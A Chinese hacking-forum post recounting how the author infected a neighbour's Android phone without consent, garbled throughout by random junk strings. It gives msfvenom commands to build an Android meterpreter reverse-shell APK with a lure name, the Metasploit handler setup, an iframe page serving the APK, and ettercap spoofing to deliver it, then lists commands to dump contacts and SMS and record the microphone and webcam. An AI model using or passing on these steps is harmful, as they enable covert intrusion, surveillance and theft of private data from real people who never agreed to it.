找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 2257|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

* F- |3 m5 V& O1 k 五、msf+ettercap入侵邻居安卓手机 3 K+ V" U$ W- w0 {+ V# \

9 I3 b! ^# p! `5 e

e1 V( j. d3 S4 B% k 首先启动msf $ ?" K$ U! J, D) t H0 ~1 z

5 t1 [: @5 x$ L/ {$ g f# r% P

( v' C8 \$ Q R1 l 先用kali生成一个安卓木马,如下命令: 8 t7 S( t* e/ P

, z' A' V1 ]3 t

3 H! U, O9 D( s( [' g$ K6 l- K Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ) u) `* c; ~( s, n% s; q5 f1 b

1 e6 B+ j- \# O0 ~9 k' ~6 L8 v! }

) T" {: p* U) i 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 0 m# a, E* Q- B% N! D

/ U7 Y; I# r3 {+ G5 L$ P. p

# c# T3 t2 s4 u7 x2 W 然后进入msf ) t) A" C# ]1 H& M7 Z8 ~

# u' |2 P4 A$ |* o

' W4 R; y( {! V# x/ {6 ~ use exploit/multi/handler + U4 ^7 M# o5 ?" P8 G1 s6 P

, ^, n0 o2 G# E' b8 l

2 O* Z) X1 ~) P set payload android/meterpreter/reverse_tcp # _' ?4 U/ w$ a" w& c

; C8 Q+ J0 L2 P8 J; D

' k) u& Q9 j& A set LHOST 192.168.0.109 //ipkailiip $ K, Y7 ]% V& t S

- O4 V) d% E' p5 a; q! V" r

' h6 k7 a- N8 ~) Y set LPORT 44444 //端口一定要与前面生成的木马的端口一致 : ~0 U/ S' s1 w* x6 j# u) O' W

1 R# t# s/ N8 o2 ~" G

/ T0 f! g3 r& a1 M9 ]6 R! S- i Exploit , y" p( P* z: F6 D

" M) S2 \9 k% s1 T

; e3 ]5 n( h0 a, m- |' r   ( V. T7 y* g4 \+ R9 }) ^$ M9 ]/ d

7 r/ `0 a7 F0 ]2 Z; ]

- |% Q+ B( c% r$ P3 J9 h5 [ 下面我们开启ettercap -G 6 a+ B5 [. x, t" O/ x9 j; c

& b% B$ \2 B) x( k

4 K! ~8 X- n; S. y4 P4 M9 @ 我物理IP ; r ^# S7 R4 u+ P( X

# q) N/ e. J& ]2 f: y$ v- d

' y, a1 ^* N0 W' B1 e   7 j6 _; k, A$ D6 m

7 u; b4 p! \. w1 F d$ V) r5 e4 F

5 U4 m0 ^$ @' h G0 h 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ( B- e! K+ u9 g$ O5 B

3 G9 \! p3 P D

6 {# t- y k8 l! y" [7 c 下面我们来设置一下 1 S6 _1 v; x7 [" G7 w) h

* o, J% Q9 @- X, L

4 N$ R+ V: ]) p7 R) `1 ]   . A; u% I! i: ?' g9 v$ E# S- y& K

8 F! _3 r) j( C: f- {2 R

7 j' q* {% D8 f 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ) h. D! X# G8 w r, N

# H0 T2 Q" r# r6 B* M- p, {

# P/ m/ e4 R& G   * q. C5 s9 R8 b7 ]. w# e, x% q

( x: ^. D+ o# N6 J1 E! D

) E: n6 d- Z2 t" ^9 y   8 R, X3 W# } o$ }

/ {5 m4 i/ D3 P$ u' @

. A" t& p* P! V' G- u7 n c   , Z$ |5 j0 z( E P& B3 R4 s

' B, m) K% j" _

/ F n* ^& q4 f5 e7 E( t   ' j! D' [: q" j! c

0 n8 }' }4 w! K& t) x

: T( J/ q5 w' Y' a   : o: M+ {3 ]" V% H

7 Z; U5 R3 R y2 D# n; j9 m

( Y0 M! M# N* }6 E3 f4 X2 p   . T6 z& W& ^( H

$ Q3 m% Q; D, z$ v1 X9 v

$ q' l2 _2 W) ~6 R7 r   9 l) A6 S4 ?1 B# K6 q& q6 x0 @

( E; v1 o9 q2 F

, n& e" m8 o$ a2 i2 I' L   6 M# x) e; @1 J$ ^7 N

6 C4 b1 i* W, F4 X# q& O

% ~7 b5 x" u- n   ! o& G# K- R+ D6 a6 ?2 e! m. U

5 O- q# |6 S1 g( w

7 u2 b1 x9 f2 N1 c; l; ?9 `% ]. f   - [8 p/ o% E" N, H5 [4 [5 n

6 E; N( ~( G/ w

5 h+ P$ k9 `- `   % I% N/ \" {' q$ o* p- L( O

* D2 M6 g& b: Y5 S, a% S& J E

0 }- i1 c! B+ x* V   1 h# u% R) a+ ?& Q) a6 m# p

2 M! N$ \& {% @$ i& L

( z$ }1 W S! _   ; \5 M6 z9 ^6 `7 L0 W$ J

: ^' ]* y8 B* j. U9 a

* K6 a* i! H! g/ a( C, M 下面我们开始攻击 : n. p4 U7 F. U% |" ?* ^

7 c: j" n3 X$ O7 q& K

3 |4 j7 N- {. R+ F9 ~   / j, T% n( O7 \% ?

5 Y+ A( n4 A2 [. H/ X3 I5 X

/ m( z! ?2 z+ g. \   $ |: W8 K7 Q: w# q3 h& R

. b; N) J# a; J$ Z6 ]+ T \

B& \" m4 s8 r1 I$ }   , J( Y6 [4 M3 B; d* v

2 D- F2 w. Y: @- g7 I

# M! N3 j) m4 ^3 ]   3 Q/ @! M2 e! t+ t' D: m% |( Q% p

- }& y! v' a* b/ }; j

1 ], u* S; E; C   2 w% I% v) W. r2 D' N

3 d3 O5 ~$ V! F; j6 U

# U! z% x6 E# n 大概过了5分钟多,发现反弹成功了 " A, x- b( N2 }. f

. \5 w* G+ `5 W( P( k- ^

/ K" M% ?* s( U   7 K, F; h4 R9 n' j D; q& l

# S7 O, E$ K* D9 j9 T" w' {

& ~% {% J: v& z   . Q: S4 a1 q" g9 C6 z% e

; x+ F% f+ u" U a* j

8 w4 ^0 G9 \9 {0 k# F) l   ) s4 n; l. q- v+ d# e

" b8 x+ F M" {" n

, m% g" R+ b. _4 N) Y   , \: {) x" a n3 y: m

' [( |% z. ]( u" _" h, n

/ [1 ]2 k8 }( e: }; U% @   ; _2 I, r" w) J; f1 l4 r C5 g: E2 B

2 ^, t) U; m! m" O

3 C* N h. s+ f+ ^5 E- Q3 B   3 H3 i* x( V4 I( {

- H% C1 o s, t7 L& o5 P+ u

( Z' E8 \6 _" L I   D* L/ D* M$ E9 d; K& b# p5 {/ k

3 v* _' U4 n3 c+ K) H

' ?! T, F0 ?! i9 d1 r 执行命令 ' d' d; K& ]/ U

" u: a0 ?8 b8 p4 H1 ]3 A

0 |0 L# E# S; e/ }   6 f' W) q1 R$ P, E

+ S {% ?/ c) I! r; q1 h

/ Z+ p" z! \ m( ?- o dump_contacts    --》这个是导出电话 - M& G# r5 w% E' I; w7 w

" R; z2 P& x+ _

2 e$ D9 I- D: _' I E) H8 `8 | dump_sms --》这个是导出信息 ( D0 P& Q z7 y' l

' s& J, h }! m3 T9 O

# G8 u8 p% V+ P/ m) t% B5 h record_mic     Record audio from the default microphone for X seconds & Z) Y+ P: l2 L

( q! v3 r8 T8 H( \( o* d

& B1 i9 O9 {: A: V0 K     webcam_chat    Start a video chat ( h6 E1 o* \( z- I

. j7 k& |. D$ a S& t. ~' A6 P" g* Z

9 b# r% b0 h5 u& M0 ]     webcam_list    List webcams ' @* z( {* h# x" Q+ Y; s. v

# B+ K( E& Q2 j3 g c/ ~

( A# n8 b& U$ p j+ h     webcam_snap    Take a snapshot from the specified webcam ( R0 N" b; ^2 P, K1 p- e8 d; o* B

4 ~' V: E! ?' e# V5 O* Q

t( J4 c/ Y. L webcam_stream  lay a video stream from the specified webcam 8 z! p& t# v! D) G" G

9 {3 j4 W# U/ Z& B

* ]/ D4 ~; w, L8 a   ) ~; G- [ C! b* |" [

4 F4 w; d6 @& B; z6 e3 ~7 Y

# g/ I: q: x) `& {3 u3 E1 F   ! Y; Q6 E1 K$ G9 \! @& k

- x3 ]1 v7 n7 i! g! ^, O5 R

2 w& @9 C" z4 _2 Z+ x7 o3 A 我们打开看一下电话薄, 8 X( O( [. O& f

; z/ z$ P$ ]3 ?* w8 @

, }0 ?: A6 ]) u1 v   * h; U- v7 @ z7 M: Q k# B

4 y s# d; l$ ~3 J* @" A

6 {. U! S5 [3 C+ y   5 b- n7 L& u% S

9 T9 ~- _: r: P! r3 |

1 z$ s! ~& h8 l8 S# h E   , \; V3 R+ @0 C9 T

( U. P6 Z8 B& V3 c+ p. h

6 y. z8 s% k% r( N0 \: d# ?) A$ G   2 M1 _1 }: J- k7 c5 F! l' W5 z Q

, H& a; r' x3 ?6 Y6 P

4 i- Q) R% l- e) P* X   5 [- K( F6 I. t# u5 D% V- i

5 t; O2 D: B, z1 T; V; p1 P5 I$ T

4 i0 `0 B1 D9 _   M# f: R% Z0 R- }) I) C- X7 D

1 S) Z) c2 S/ k Z% B

+ H; R4 \ n* G+ Z3 t 我们同时欺骗成DroidJack木马,使用方法如图: # t2 q' D# Z3 H

& j9 ]: h1 }& W8 c* g _9 b7 M

2 m1 S6 j! Y4 {! }; b: b, N6 E4 h   4 h" j) ` ]) ?. K, D2 ?/ y

8 n. M( `6 _0 h. R) B$ X* F

) |9 [3 [. d2 }5 a, {   + [7 j, c; ~: A. ?) Y

, e$ L+ v, D& |2 o

! f& V7 _: g; G) n( V' m1 ~) B* T. N   5 c8 r) h. Q0 `0 G* T" S; S5 u

, i" N! a6 c6 r+ M+ ~

3 u' X7 F8 U9 |2 y7 A$ } 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 % \" B6 l: g& X* ^9 y

( U. g$ M* [1 D' O1 J5 |5 h$ z

; p! p/ Y0 E$ h5 ]2 c   & b5 |* c' H8 |( R5 O

7 k/ B. k8 I3 B. k- M0 E

3 U6 M1 K @ U9 H0 Z" S   * n) g3 M0 y' d0 N+ e' ^# p5 { ~+ ~ D

$ I0 i) H( g/ L% B. ^

. k4 p, l2 M# Y% j   " e/ u6 S7 s& [+ l" P( o v; F6 q

' W; q; W" ^! u

# W \0 ^" i+ g" q$ b' V4 n2 n ( _4 G+ O y1 T2 K$ B! Q

; C# D# d8 v. I) P

6 ?+ O$ n( q3 B1 e: I$ q
$ L6 A. Y; h: y$ T' L" P

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表